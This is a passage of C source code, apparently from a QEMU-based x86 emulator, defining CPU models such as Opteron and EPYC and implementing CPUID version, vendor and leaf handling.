.features[FEAT_7_0_ECX] = CPUID_7_0_ECX_AVX512_VPOPCNTDQ, .features[FEAT_7_0_EDX] = CPUID_7_0_EDX_AVX512_4VNNIW | CPUID_7_0_EDX_AVX512_4FMAPS, .features[FEAT_XSAVE] = CPUID_XSAVE_XSAVEOPT, .features[FEAT_6_EAX] = CPUID_6_EAX_ARAT, .xlevel = 0x80000008, .model_id = "Intel Xeon Phi Processor (Knights Mill)", }, { .name = "Opteron_G1", .level = 5, .vendor = CPUID_VENDOR_AMD, .family = 15, .model = 6, .stepping = 1, .features[FEAT_1_EDX] = CPUID_VME | CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | CPUID_DE | CPUID_FP87, .features[FEAT_1_ECX] = CPUID_EXT_SSE3, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_LM | CPUID_EXT2_NX | CPUID_EXT2_SYSCALL, .xlevel = 0x80000008, .model_id = "AMD Opteron 240 (Gen 1 Class Opteron)", }, { .name = "Opteron_G2", .level = 5, .vendor = CPUID_VENDOR_AMD, .family = 15, .model = 6, .stepping = 1, .features[FEAT_1_EDX] = CPUID_VME | CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | CPUID_DE | CPUID_FP87, .features[FEAT_1_ECX] = CPUID_EXT_CX16 | CPUID_EXT_SSE3, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_LM | CPUID_EXT2_NX | CPUID_EXT2_SYSCALL, .features[FEAT_8000_0001_ECX] = CPUID_EXT3_SVM | CPUID_EXT3_LAHF_LM, .xlevel = 0x80000008, .model_id = "AMD Opteron 22xx (Gen 2 Class Opteron)", }, { .name = "Opteron_G3", .level = 5, .vendor = CPUID_VENDOR_AMD, .family = 16, .model = 2, .stepping = 3, .features[FEAT_1_EDX] = CPUID_VME | CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | CPUID_DE | CPUID_FP87, .features[FEAT_1_ECX] = CPUID_EXT_POPCNT | CPUID_EXT_CX16 | CPUID_EXT_MONITOR | CPUID_EXT_SSE3, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_LM | CPUID_EXT2_NX | CPUID_EXT2_SYSCALL | CPUID_EXT2_RDTSCP, .features[FEAT_8000_0001_ECX] = CPUID_EXT3_MISALIGNSSE | CPUID_EXT3_SSE4A | CPUID_EXT3_ABM | CPUID_EXT3_SVM | CPUID_EXT3_LAHF_LM, .xlevel = 0x80000008, .model_id = "AMD Opteron 23xx (Gen 3 Class Opteron)", }, { .name = "Opteron_G4", .level = 0xd, .vendor = CPUID_VENDOR_AMD, .family = 21, .model = 1, .stepping = 2, .features[FEAT_1_EDX] = CPUID_VME | CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | CPUID_DE | CPUID_FP87, .features[FEAT_1_ECX] = CPUID_EXT_AVX | CPUID_EXT_XSAVE | CPUID_EXT_AES | CPUID_EXT_POPCNT | CPUID_EXT_SSE42 | CPUID_EXT_SSE41 | CPUID_EXT_CX16 | CPUID_EXT_SSSE3 | CPUID_EXT_PCLMULQDQ | CPUID_EXT_SSE3, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_LM | CPUID_EXT2_PDPE1GB | CPUID_EXT2_NX | CPUID_EXT2_SYSCALL | CPUID_EXT2_RDTSCP, .features[FEAT_8000_0001_ECX] = CPUID_EXT3_FMA4 | CPUID_EXT3_XOP | CPUID_EXT3_3DNOWPREFETCH | CPUID_EXT3_MISALIGNSSE | CPUID_EXT3_SSE4A | CPUID_EXT3_ABM | CPUID_EXT3_SVM | CPUID_EXT3_LAHF_LM, .features[FEAT_SVM] = CPUID_SVM_NPT | CPUID_SVM_NRIPSAVE, /* no xsaveopt! */ .xlevel = 0x8000001A, .model_id = "AMD Opteron 62xx class CPU", }, { .name = "Opteron_G5", .level = 0xd, .vendor = CPUID_VENDOR_AMD, .family = 21, .model = 2, .stepping = 0, .features[FEAT_1_EDX] = CPUID_VME | CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | CPUID_DE | CPUID_FP87, .features[FEAT_1_ECX] = CPUID_EXT_F16C | CPUID_EXT_AVX | CPUID_EXT_XSAVE | CPUID_EXT_AES | CPUID_EXT_POPCNT | CPUID_EXT_SSE42 | CPUID_EXT_SSE41 | CPUID_EXT_CX16 | CPUID_EXT_FMA | CPUID_EXT_SSSE3 | CPUID_EXT_PCLMULQDQ | CPUID_EXT_SSE3, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_LM | CPUID_EXT2_PDPE1GB | CPUID_EXT2_NX | CPUID_EXT2_SYSCALL | CPUID_EXT2_RDTSCP, .features[FEAT_8000_0001_ECX] = CPUID_EXT3_TBM | CPUID_EXT3_FMA4 | CPUID_EXT3_XOP | CPUID_EXT3_3DNOWPREFETCH | CPUID_EXT3_MISALIGNSSE | CPUID_EXT3_SSE4A | CPUID_EXT3_ABM | CPUID_EXT3_SVM | CPUID_EXT3_LAHF_LM, .features[FEAT_SVM] = CPUID_SVM_NPT | CPUID_SVM_NRIPSAVE, /* no xsaveopt! */ .xlevel = 0x8000001A, .model_id = "AMD Opteron 63xx class CPU", }, { .name = "EPYC", .level = 0xd, .vendor = CPUID_VENDOR_AMD, .family = 23, .model = 1, .stepping = 2, .features[FEAT_1_EDX] = CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | CPUID_DE | CPUID_VME | CPUID_FP87, .features[FEAT_1_ECX] = CPUID_EXT_RDRAND | CPUID_EXT_F16C | CPUID_EXT_AVX | CPUID_EXT_XSAVE | CPUID_EXT_AES | CPUID_EXT_POPCNT | CPUID_EXT_MOVBE | CPUID_EXT_SSE42 | CPUID_EXT_SSE41 | CPUID_EXT_CX16 | CPUID_EXT_FMA | CPUID_EXT_SSSE3 | CPUID_EXT_MONITOR | CPUID_EXT_PCLMULQDQ | CPUID_EXT_SSE3, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_LM | CPUID_EXT2_RDTSCP | CPUID_EXT2_PDPE1GB | CPUID_EXT2_FFXSR | CPUID_EXT2_MMXEXT | CPUID_EXT2_NX | CPUID_EXT2_SYSCALL, .features[FEAT_8000_0001_ECX] = CPUID_EXT3_OSVW | CPUID_EXT3_3DNOWPREFETCH | CPUID_EXT3_MISALIGNSSE | CPUID_EXT3_SSE4A | CPUID_EXT3_ABM | CPUID_EXT3_CR8LEG | CPUID_EXT3_SVM | CPUID_EXT3_LAHF_LM | CPUID_EXT3_TOPOEXT, .features[FEAT_7_0_EBX] = CPUID_7_0_EBX_FSGSBASE | CPUID_7_0_EBX_BMI1 | CPUID_7_0_EBX_AVX2 | CPUID_7_0_EBX_SMEP | CPUID_7_0_EBX_BMI2 | CPUID_7_0_EBX_RDSEED | CPUID_7_0_EBX_ADX | CPUID_7_0_EBX_SMAP | CPUID_7_0_EBX_CLFLUSHOPT | CPUID_7_0_EBX_SHA_NI, .features[FEAT_XSAVE] = CPUID_XSAVE_XSAVEOPT | CPUID_XSAVE_XSAVEC | CPUID_XSAVE_XGETBV1, .features[FEAT_6_EAX] = CPUID_6_EAX_ARAT, .features[FEAT_SVM] = CPUID_SVM_NPT | CPUID_SVM_NRIPSAVE, .xlevel = 0x8000001E, .model_id = "AMD EPYC Processor", .cache_info = &epyc_cache_info, .use_epyc_apic_id_encoding = 1, .versions = (X86CPUVersionDefinition[]) { { .version = 1 }, { .version = 2, .alias = "EPYC-IBPB", .props = (PropValue[]) { { "ibpb", "on" }, { "model-id", "AMD EPYC Processor (with IBPB)" }, { NULL /* end of list */ } } }, { .version = 3, .props = (PropValue[]) { { "ibpb", "on" }, { "perfctr-core", "on" }, { "clzero", "on" }, { "xsaveerptr", "on" }, { "xsaves", "on" }, { "model-id", "AMD EPYC Processor" }, { NULL /* end of list */ } } }, { 0 /* end of list */ } } }, { .name = "Dhyana", .level = 0xd, .vendor = CPUID_VENDOR_HYGON, .family = 24, .model = 0, .stepping = 1, .features[FEAT_1_EDX] = CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | CPUID_DE | CPUID_VME | CPUID_FP87, .features[FEAT_1_ECX] = CPUID_EXT_RDRAND | CPUID_EXT_F16C | CPUID_EXT_AVX | CPUID_EXT_XSAVE | CPUID_EXT_POPCNT | CPUID_EXT_MOVBE | CPUID_EXT_SSE42 | CPUID_EXT_SSE41 | CPUID_EXT_CX16 | CPUID_EXT_FMA | CPUID_EXT_SSSE3 | CPUID_EXT_MONITOR | CPUID_EXT_SSE3, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_LM | CPUID_EXT2_RDTSCP | CPUID_EXT2_PDPE1GB | CPUID_EXT2_FFXSR | CPUID_EXT2_MMXEXT | CPUID_EXT2_NX | CPUID_EXT2_SYSCALL, .features[FEAT_8000_0001_ECX] = CPUID_EXT3_OSVW | CPUID_EXT3_3DNOWPREFETCH | CPUID_EXT3_MISALIGNSSE | CPUID_EXT3_SSE4A | CPUID_EXT3_ABM | CPUID_EXT3_CR8LEG | CPUID_EXT3_SVM | CPUID_EXT3_LAHF_LM | CPUID_EXT3_TOPOEXT, .features[FEAT_8000_0008_EBX] = CPUID_8000_0008_EBX_IBPB, .features[FEAT_7_0_EBX] = CPUID_7_0_EBX_FSGSBASE | CPUID_7_0_EBX_BMI1 | CPUID_7_0_EBX_AVX2 | CPUID_7_0_EBX_SMEP | CPUID_7_0_EBX_BMI2 | CPUID_7_0_EBX_RDSEED | CPUID_7_0_EBX_ADX | CPUID_7_0_EBX_SMAP | CPUID_7_0_EBX_CLFLUSHOPT, /* * Missing: XSAVES (not supported by some Linux versions, * including v4.1 to v4.12). * KVM doesn't yet expose any XSAVES state save component. */ .features[FEAT_XSAVE] = CPUID_XSAVE_XSAVEOPT | CPUID_XSAVE_XSAVEC | CPUID_XSAVE_XGETBV1, .features[FEAT_6_EAX] = CPUID_6_EAX_ARAT, .features[FEAT_SVM] = CPUID_SVM_NPT | CPUID_SVM_NRIPSAVE, .xlevel = 0x8000001E, .model_id = "Hygon Dhyana Processor", .cache_info = &epyc_cache_info, }, { .name = "EPYC-Rome", .level = 0xd, .vendor = CPUID_VENDOR_AMD, .family = 23, .model = 49, .stepping = 0, .features[FEAT_1_EDX] = CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | CPUID_DE | CPUID_VME | CPUID_FP87, .features[FEAT_1_ECX] = CPUID_EXT_RDRAND | CPUID_EXT_F16C | CPUID_EXT_AVX | CPUID_EXT_XSAVE | CPUID_EXT_AES | CPUID_EXT_POPCNT | CPUID_EXT_MOVBE | CPUID_EXT_SSE42 | CPUID_EXT_SSE41 | CPUID_EXT_CX16 | CPUID_EXT_FMA | CPUID_EXT_SSSE3 | CPUID_EXT_MONITOR | CPUID_EXT_PCLMULQDQ | CPUID_EXT_SSE3, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_LM | CPUID_EXT2_RDTSCP | CPUID_EXT2_PDPE1GB | CPUID_EXT2_FFXSR | CPUID_EXT2_MMXEXT | CPUID_EXT2_NX | CPUID_EXT2_SYSCALL, .features[FEAT_8000_0001_ECX] = CPUID_EXT3_OSVW | CPUID_EXT3_3DNOWPREFETCH | CPUID_EXT3_MISALIGNSSE | CPUID_EXT3_SSE4A | CPUID_EXT3_ABM | CPUID_EXT3_CR8LEG | CPUID_EXT3_SVM | CPUID_EXT3_LAHF_LM | CPUID_EXT3_TOPOEXT | CPUID_EXT3_PERFCORE, .features[FEAT_8000_0008_EBX] = CPUID_8000_0008_EBX_CLZERO | CPUID_8000_0008_EBX_XSAVEERPTR | CPUID_8000_0008_EBX_WBNOINVD | CPUID_8000_0008_EBX_IBPB | CPUID_8000_0008_EBX_STIBP, .features[FEAT_7_0_EBX] = CPUID_7_0_EBX_FSGSBASE | CPUID_7_0_EBX_BMI1 | CPUID_7_0_EBX_AVX2 | CPUID_7_0_EBX_SMEP | CPUID_7_0_EBX_BMI2 | CPUID_7_0_EBX_RDSEED | CPUID_7_0_EBX_ADX | CPUID_7_0_EBX_SMAP | CPUID_7_0_EBX_CLFLUSHOPT | CPUID_7_0_EBX_SHA_NI | CPUID_7_0_EBX_CLWB, .features[FEAT_7_0_ECX] = CPUID_7_0_ECX_UMIP | CPUID_7_0_ECX_RDPID, .features[FEAT_XSAVE] = CPUID_XSAVE_XSAVEOPT | CPUID_XSAVE_XSAVEC | CPUID_XSAVE_XGETBV1 | CPUID_XSAVE_XSAVES, .features[FEAT_6_EAX] = CPUID_6_EAX_ARAT, .features[FEAT_SVM] = CPUID_SVM_NPT | CPUID_SVM_NRIPSAVE, .xlevel = 0x8000001E, .model_id = "AMD EPYC-Rome Processor", .cache_info = &epyc_rome_cache_info, .use_epyc_apic_id_encoding = 1, }, }; /* * We resolve CPU model aliases using -v1 when using "-machine * none", but this is just for compatibility while libvirt isn't * adapted to resolve CPU model versions before creating VMs. * See "Runnability guarantee of CPU models" at * qemu-deprecated.texi. */ X86CPUVersion default_cpu_version = 1; void x86_cpu_set_default_version(X86CPUVersion version) { /* Translating CPU_VERSION_AUTO to CPU_VERSION_AUTO doesn't make sense */ assert(version != CPU_VERSION_AUTO); default_cpu_version = version; } #define CPUID_MODEL_ID_SZ 48 static bool x86_cpu_have_filtered_features(X86CPU *cpu) { FeatureWord w; for (w = 0; w < FEATURE_WORDS; w++) { if (cpu->filtered_features[w]) { return true; } } return false; } static void mark_unavailable_features(X86CPU *cpu, FeatureWord w, uint64_t mask, const char *verbose_prefix) { CPUX86State *env = &cpu->env; if (!cpu->force_features) { env->features[w] &= ~mask; } cpu->filtered_features[w] |= mask; if (!verbose_prefix) { return; } } /* Convert all '_' in a feature string option name to '-', to make feature * name conform to QOM property naming rule, which uses '-' instead of '_'. */ static inline void feat2prop(char *s) { while ((s = strchr(s, '_'))) { *s = '-'; } } static void x86_cpu_filter_features(X86CPU *cpu, bool verbose); static uint64_t x86_cpu_get_supported_feature_word(FeatureWord w, bool migratable_only) { FeatureWordInfo *wi = &feature_word_info[w]; uint64_t r; // TCG enable r = wi->tcg_features; return r; } /* Load data from X86CPUDefinition into a X86CPU object */ static void x86_cpu_load_model(X86CPU *cpu, X86CPUModel *model) { X86CPUDefinition *def = model->cpudef; CPUX86State *env = &cpu->env; FeatureWord w; env->cpuid_min_level = def->level; env->cpuid_xlevel = def->xlevel; x86_cpuid_version_set_family(cpu, def->family); x86_cpuid_version_set_model(cpu, def->model); x86_cpuid_version_set_stepping(cpu, def->stepping); x86_cpuid_set_model_id(cpu, def->model_id); for (w = 0; w < FEATURE_WORDS; w++) { env->features[w] = def->features[w]; } /* legacy-cache defaults to 'off' if CPU model provides cache info */ cpu->legacy_cache = !def->cache_info; env->features[FEAT_1_ECX] |= CPUID_EXT_HYPERVISOR; /* sysenter isn't supported in compatibility mode on AMD, * syscall isn't supported in compatibility mode on Intel. * Normally we advertise the actual CPU vendor, but you can * override this using the 'vendor' property if you want to use * KVM's sysenter/syscall emulation in compatibility mode and * when doing cross vendor migration */ if (accel_uses_host_cpuid()) { uint32_t ebx = 0, ecx = 0, edx = 0; host_cpuid(0, 0, NULL, &ebx, &ecx, &edx); } x86_cpuid_set_vendor(cpu, def->vendor); } void cpu_clear_apic_feature(CPUX86State *env) { env->features[FEAT_1_EDX] &= ~CPUID_APIC; } static void x86_cpuid_version_set_family(X86CPU *cpu, int64_t value) { CPUX86State *env = &cpu->env; const int64_t min = 0; const int64_t max = 0xff + 0xf; if (value < min || value > max) { // error_setg(errp, QERR_PROPERTY_VALUE_OUT_OF_RANGE, "", // name ? name : "null", value, min, max); return; } env->cpuid_version &= ~0xff00f00; if (value > 0x0f) { env->cpuid_version |= 0xf00 | ((value - 0x0f) << 20); } else { env->cpuid_version |= value << 8; } } static void x86_cpuid_version_set_model(X86CPU *cpu, int64_t value) { CPUX86State *env = &cpu->env; const int64_t min = 0; const int64_t max = 0xff; if (value < min || value > max) { // error_setg(errp, QERR_PROPERTY_VALUE_OUT_OF_RANGE, "", // name ? name : "null", value, min, max); return; } env->cpuid_version &= ~0xf00f0; env->cpuid_version |= ((value & 0xf) << 4) | ((value >> 4) << 16); } static void x86_cpuid_version_set_stepping(X86CPU *cpu, int64_t value) { CPUX86State *env = &cpu->env; const int64_t min = 0; const int64_t max = 0xf; if (value < min || value > max) { // error_setg(errp, QERR_PROPERTY_VALUE_OUT_OF_RANGE, "", // name ? name : "null", value, min, max); return; } env->cpuid_version &= ~0xf; env->cpuid_version |= value & 0xf; } static void x86_cpuid_set_model_id(X86CPU *cpu, const char* model_id) { CPUX86State *env = &cpu->env; int c, len, i; if (model_id == NULL) { model_id = ""; } len = strlen(model_id); memset(env->cpuid_model, 0, 48); for (i = 0; i < 48; i++) { if (i >= len) { c = '\0'; } else { c = (uint8_t)model_id[i]; } env->cpuid_model[i >> 2] |= c << (8 * (i & 3)); } } static void x86_cpuid_set_vendor(X86CPU *cpu , const char *value) { CPUX86State *env = &cpu->env; int i; if (strlen(value) != CPUID_VENDOR_SZ) { // error_setg(errp, QERR_PROPERTY_VALUE_BAD, "", "vendor", value); return; } env->cpuid_vendor1 = 0; env->cpuid_vendor2 = 0; env->cpuid_vendor3 = 0; for (i = 0; i < 4; i++) { env->cpuid_vendor1 |= ((uint8_t)value[i ]) << (8 * i); env->cpuid_vendor2 |= ((uint8_t)value[i + 4]) << (8 * i); env->cpuid_vendor3 |= ((uint8_t)value[i + 8]) << (8 * i); } } void cpu_x86_cpuid(CPUX86State *env, uint32_t index, uint32_t count, uint32_t *eax, uint32_t *ebx, uint32_t *ecx, uint32_t *edx) { X86CPU *cpu = env_archcpu(env); CPUState *cs = env_cpu(env); uint32_t die_offset; uint32_t limit; uint32_t signature[3]; X86CPUTopoInfo topo_info; topo_info.nodes_per_pkg = env->nr_nodes; topo_info.dies_per_pkg = env->nr_dies; topo_info.cores_per_die = cs->nr_cores; topo_info.threads_per_core = cs->nr_threads; /* Calculate & apply limits for different index ranges */ if (index >= 0xC0000000) { limit = env->cpuid_xlevel2; } else if (index >= 0x80000000) { limit = env->cpuid_xlevel; } else if (index >= 0x40000000) { limit = 0x40000001; } else { limit = env->cpuid_level; } if (index > limit) { /* Intel documentation states that invalid EAX input will * return the same information as EAX=cpuid_level * (Intel SDM Vol. 2A - Instruction Set Reference - CPUID) */ index = env->cpuid_level; } switch(index) { case 0: *eax = env->cpuid_level; *ebx = env->cpuid_vendor1; *edx = env->cpuid_vendor2; *ecx = env->cpuid_vendor3; break; case 1: *eax = env->cpuid_version; *ebx = (cpu->apic_id << 24) | 8 << 8; /* CLFLUSH size in quad words, Linux wants it. */ *ecx = env->features[FEAT_1_ECX]; if ((*ecx & CPUID_EXT_XSAVE) && (env->cr[4] & CR4_OSXSAVE_MASK)) { *ecx |= CPUID_EXT_OSXSAVE; } *edx = env->features[FEAT_1_EDX]; if (cs->nr_cores * cs->nr_threads > 1) { *ebx |= (cs->nr_cores * cs->nr_threads) << 16; *edx |= CPUID_HT; } break; case 2: /* cache info: needed for Pentium Pro compatibility */ if (cpu->cache_info_passthrough) { host_cpuid(index, 0, eax, ebx, ecx, edx); break; } *eax = 1; /* Number of CPUID[EAX=2] calls required */ *ebx = 0; if (!cpu->enable_l3_cache) { *ecx = 0; } else { *ecx = cpuid2_cache_descriptor(env->cache_info_cpuid2.l3_cache); } *edx = (cpuid2_cache_descriptor(env->cache_info_cpuid2.l1d_cache) << 16) | (cpuid2_cache_descriptor(env->cache_info_cpuid2.l1i_cache) << 8) | (cpuid2_cache_descriptor(env->cache_info_cpuid2.l2_cache)); break; case 4: /* cache info: needed for Core compatibility */ if (cpu->cache_info_passthrough) { host_cpuid(index, count, eax, ebx, ecx, edx); /* QEMU gives out its own APIC IDs, never pass down bits 31..26. */ *eax &= ~0xFC000000; if ((*eax & 31) && cs->nr_cores > 1) { *eax |= (cs->nr_cores - 1) << 26; } } else { *eax = 0; switch (count) { case 0: /* L1 dcache info */ encode_cache_cpuid4(env->cache_info_cpuid4.l1d_cache, 1, cs->nr_cores, eax, ebx, ecx, edx); break; case 1: /* L1 icache info */ encode_cache_cpuid4(env->cache_info_cpuid4.l1i_cache, 1, cs->nr_cores, eax, ebx, ecx, edx); break; case 2: /* L2 cache info */ encode_cache_cpuid4(env->cache_info_cpuid4.l2_cache, cs->nr_threads, cs->nr_cores, eax, ebx, ecx, edx); break; case 3: /* L3 cache info */ die_offset = apicid_die_offset(&topo_info); if (cpu->enable_l3_cache) { encode_cache_cpuid4(env->cache_info_cpuid4.l3_cache, (1 << die_offset), cs->nr_cores, eax, ebx, ecx, edx); break; } /* fall through */ default: /* end of info */ *eax = *ebx = *ecx = *edx = 0; break; } } break; case 5: /* MONITOR/MWAIT Leaf */ *eax = cpu->mwait.eax; /* Smallest monitor-line size in bytes */ *ebx = cpu->mwait.ebx; /* Largest monitor-line size in bytes */ *ecx = cpu->mwait.ecx; /* flags */ *edx = cpu->mwait.edx; /* mwait substates */ break; case 6: /* Thermal and Power Leaf */ *eax = env->features[FEAT_6_EAX]; *ebx = 0; *ecx = 0; *edx = 0; break; case 7: /* Structured Extended Feature Flags Enumeration Leaf */ if (count == 0) { /* Maximum ECX value for sub-leaves */ *eax = env->cpuid_level_func7; *ebx = env->features[FEAT_7_0_EBX]; /* Feature flags */ *ecx = env->features[FEAT_7_0_ECX]; /* Feature flags */ if ((*ecx & CPUID_7_0_ECX_PKU) && env->cr[4] & CR4_PKE_MASK) { *ecx |= CPUID_7_0_ECX_OSPKE; } *edx = env->features[FEAT_7_0_EDX]; /* Feature flags */ } else if (count == 1) { *eax = env->features[FEAT_7_1_EAX]; *ebx = 0; *ecx = 0; *edx = 0; } else { *eax = 0; *ebx = 0; *ecx = 0; *edx = 0; } break; case 9: /* Direct Cache Access Information Leaf */ *eax = 0; /* Bits 0-31 in DCA_CAP MSR */ *ebx = 0; *ecx = 0; *edx = 0; break; case 0xA: /* Architectural Performance Monitoring Leaf */ *eax = 0; *ebx = 0; *ecx = 0; *edx = 0; break; case 0xB: /* Extended Topology Enumeration Leaf */ if (!cpu->enable_cpuid_0xb) { *eax = *ebx = *ecx = *edx = 0; break; } *ecx = count & 0xff; *edx = cpu->apic_id; switch (count) { case 0: *eax = apicid_core_offset(&topo_info); *ebx = cs->nr_threads; *ecx |= CPUID_TOPOLOGY_LEVEL_SMT; break; case 1: *eax = env->pkg_offset; *ebx = cs->nr_cores * cs->nr_threads; *ecx |= CPUID_TOPOLOGY_LEVEL_CORE; break; default: *eax = 0; *ebx = 0; *ecx |= CPUID_TOPOLOGY_LEVEL_INVALID; } assert(!(*eax & ~0x1f)); *ebx &= 0xffff; /* The count doesn't need to be reliable. */ break; case 0x1F: /* V2 Extended Topology Enumeration Leaf */ if (env->nr_dies < 2) { *eax = *ebx = *ecx = *edx = 0; break; } *ecx = count & 0xff; *edx = cpu->apic_id; switch (count) { case 0: *eax = apicid_core_offset(&topo_info); *ebx = cs->nr_threads; *ecx |= CPUID_TOPOLOGY_LEVEL_SMT; break; case 1: *eax = apicid_die_offset(&topo_info); *ebx = cs->nr_cores * cs->nr_threads; *ecx |= CPUID_TOPOLOGY_LEVEL_CORE; break; case 2: *eax = env->pkg_offset; *ebx = env->nr_dies * cs->nr_cores * cs->nr_threads; *ecx |= CPUID_TOPOLOGY_LEVEL_DIE; break; default: *eax = 0; *ebx = 0; *ecx |= CPUID_TOPOLOGY_LEVEL_INVALID; } assert(!(*eax & ~0x1f)); *ebx &= 0xffff; /* The count doesn't need to be reliable. */ break; case 0xD: { /* Processor Extended State */ *eax = 0; *ebx = 0; *ecx = 0; *edx = 0; if (!(env->features[FEAT_1_ECX] & CPUID_EXT_XSAVE)) { break; } if (count == 0) { *ecx = xsave_area_size(x86_cpu_xsave_components(cpu)); *eax = env->features[FEAT_XSAVE_COMP_LO]; *edx = env->features[FEAT_XSAVE_COMP_HI]; /* * The initial value of xcr0 and ebx == 0, On host without kvm * commit 412a3c41(e.g., CentOS 6), the ebx's value always == 0 * even through guest update xcr0, this will crash some legacy guest * (e.g., CentOS 6), So set ebx == ecx to workaroud it. */ *ebx = xsave_area_size(env->xcr0); } else if (count == 1) { *eax = env->features[FEAT_XSAVE]; } else if (count < ARRAY_SIZE(x86_ext_save_areas)) { if ((x86_cpu_xsave_components(cpu) >> count) & 1) { const ExtSaveArea *esa = &x86_ext_save_areas[count]; *eax = esa->size; *ebx = esa->offset; } } break; } case 0x14: { /* Intel Processor Trace Enumeration */ *eax = 0; *ebx = 0; *ecx = 0; *edx = 0; if (!(env->features[FEAT_7_0_EBX] & CPUID_7_0_EBX_INTEL_PT)) { break; } if (count == 0) { *eax = INTEL_PT_MAX_SUBLEAF; *ebx = INTEL_PT_MINIMAL_EBX; *ecx = INTEL_PT_MINIMAL_ECX; } else if (count == 1) { *eax = INTEL_PT_MTC_BITMAP | INTEL_PT_ADDR_RANGES_NUM; *ebx = INTEL_PT_PSB_BITMAP | INTEL_PT_CYCLE_BITMAP; } break; } case 0x40000000: /* * CPUID code in kvm_arch_init_vcpu() ignores stuff * set here, but we restrict to TCG none the less. */ if (cpu->expose_tcg) { memcpy(signature, "TCGTCGTCGTCG", 12); *eax = 0x40000001; *ebx = signature[0]; *ecx = signature[1]; *edx = signature[2]; } else { *eax = 0; *ebx = 0; *ecx = 0; *edx = 0; } break; case 0x40000001: *eax = 0; *ebx = 0; *ecx = 0; *edx = 0; break; case 0x80000000: *eax = env->cpuid_xlevel; *ebx = env->cpuid_vendor1; *edx = env->cpuid_vendor2; *ecx = env->cpuid_vendor3; break; case 0x80000001: *eax = env->cpuid_version; *ebx = 0; *ecx = env->features[FEAT_8000_0001_ECX]; *edx = env->features[FEAT_8000_0001_EDX]; /* The Linux kernel checks for the CMPLegacy bit and * discards multiple thread information if it is set. * So don't set it here for Intel to make Linux guests happy. */ if (cs->nr_cores * cs->nr_threads > 1) { if (env->cpuid_vendor1 != CPUID_VENDOR_INTEL_1 || env->cpuid_vendor2 != CPUID_VENDOR_INTEL_2 || env->cpuid_vendor3 != CPUID_VENDOR_INTEL_3) { *ecx |= 1 << 1; /* CmpLegacy bit */ } } break; case 0x80000002: case 0x80000003: case 0x80000004: *eax = env->cpuid_model[(index - 0x80000002) * 4 + 0]; *ebx = env->cpuid_model[(index - 0x80000002) * 4 + 1]; *ecx = env->cpuid_model[(index - 0x80000002) * 4 + 2]; *edx = env->cpuid_model[(index - 0x80000002) * 4 + 3]; break; case 0x80000005: /* cache info (L1 cache) */ if (cpu->cache_info_passthrough) { host_cpuid(index, 0, eax, ebx, ecx, edx); break; } *eax = (L1_DTLB_2M_ASSOC << 24) | (L1_DTLB_2M_ENTRIES << 16) | \ (L1_ITLB_2M_ASSOC << 8) | (L1_ITLB_2M_ENTRIES); *ebx = (L1_DTLB_4K_ASSOC << 24) | (L1_DTLB_4K_ENTRIES << 16) | \ (L1_ITLB_4K_ASSOC << 8) | (L1_ITLB_4K_ENTRIES); *ecx = encode_cache_cpuid80000005(env->cache_info_amd.l1d_cache); *edx = encode_cache_cpuid80000005(env->cache_info_amd.l1i_cache); break; case 0x80000006: /* cache info (L2 cache) */ if (cpu->cache_info_passthrough) { host_cpuid(index, 0, eax, ebx, ecx, edx); break; } *eax = (AMD_ENC_ASSOC(L2_DTLB_2M_ASSOC) << 28) | \ (L2_DTLB_2M_ENTRIES << 16) | \ (AMD_ENC_ASSOC(L2_ITLB_2M_ASSOC) << 12) | \ 